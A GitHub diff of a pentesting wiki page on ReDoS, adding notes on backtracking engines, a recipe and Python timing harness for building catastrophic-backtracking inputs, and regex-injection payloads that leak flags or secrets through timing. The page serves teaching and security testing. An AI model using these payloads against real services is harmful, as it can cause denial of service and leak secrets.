You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: src/pentesting-web/regular-expression-denial-of-service-redos.md
+55-8Lines changed: 55 additions & 8 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -8,7 +8,12 @@ A **Regular Expression Denial of Service (ReDoS)** happens when someone takes ad
8
8
9
9
## The Problematic Regex Naïve Algorithm
10
10
11
-
**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
11
+
**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
12
+
13
+
### Engine behavior and exploitability
14
+
15
+
- Most popular engines (PCRE, Java `java.util.regex`, Python `re`, JavaScript `RegExp`) use a **backtracking** VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking.
16
+
- Some engines/libraries are designed to be **ReDoS-resilient** by construction (no backtracking), e.g. **RE2** and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details.
@@ -18,10 +23,36 @@ An evil regular expression pattern is that one that can **get stuck on crafted i
18
23
- ([a-zA-Z]+)\*
19
24
- (a|aa)+
20
25
- (a|a?)+
21
-
- (.\*a){x} for x > 10
26
+
- (.*a){x} for x > 10
22
27
23
28
All those are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`.
24
29
30
+
### Practical recipe to build PoCs
31
+
32
+
Most catastrophic cases follow this shape:
33
+
34
+
- Prefix that gets you into the vulnerable subpattern (optional).
35
+
- Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many `a`, `_`, or spaces).
36
+
- A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like `!`).
37
+
38
+
Minimal examples:
39
+
40
+
-`(a+)+$` vs input `"a"*N + "!"`
41
+
-`\w*_*\w*$` vs input `"v" + "_"*N + "!"`
42
+
43
+
Increase N and observe super‑linear growth.
44
+
45
+
#### Quick timing harness (Python)
46
+
47
+
```python
48
+
import re, time
49
+
pat = re.compile(r'(\w*_)\w*$')
50
+
for n in [2**k for k inrange(8, 15)]:
51
+
s ='v'+'_'*n +'!'
52
+
t0=time.time(); pat.search(s); dt=time.time()-t0
53
+
print(n, f"{dt:.3f}s")
54
+
```
55
+
25
56
## ReDoS Payloads
26
57
27
58
### String Exfiltration via ReDoS
@@ -30,7 +61,7 @@ In a CTF (or bug bounty) maybe you **control the Regex a sensitive information (
30
61
31
62
- In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=<flag>)((.*)*)*salt$`
32
63
- Example: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
33
-
- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`<flag>(((((((.*)*)*)*)*)*)*)!`
64
+
- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`<flag>(((((((.*)*)*)*)*)*)*)!`
34
65
- In [**this writeup**](https://ctftime.org/writeup/25869) he used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
35
66
36
67
### ReDoS Controlling Input and Regex
@@ -67,19 +98,35 @@ Regexp (a+)*$ took 723 milliseconds.
67
98
*/
68
99
```
69
100
101
+
### Language/engine notes for attackers
102
+
103
+
- JavaScript (browser/Node): Built‑in `RegExp` is a backtracking engine and commonly exploitable when regex+input are attacker‑influenced.
104
+
- Python: `re` is backtracking. Long ambiguous runs plus a failing tail often yield catastrophic backtracking.
105
+
- Java: `java.util.regex` is backtracking. If you only control input, look for endpoints using complex validators; if you control patterns (e.g., stored rules), ReDoS is usually trivial.
106
+
- Engines such as **RE2/RE2J/RE2JS** or the **Rust regex** crate are designed to avoid catastrophic backtracking. If you hit these, focus on other bottlenecks (e.g., enormous patterns) or find components still using backtracking engines.
- End‑to‑end pipeline to extract regexes from a project, detect vulnerable ones, and validate PoCs in the target language. Useful for hunting through large codebases.
- Simple CLI/JS library that reasons about backtracking to report if a pattern is safe.
120
+
121
+
> Tip: When you only control input, generate strings with doubling lengths (e.g., 2^k characters) and track latency. Exponential growth strongly indicates a viable ReDoS.
- SoK (2024): A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS) — [https://arxiv.org/abs/2406.11618](https://arxiv.org/abs/2406.11618)
0 commit comments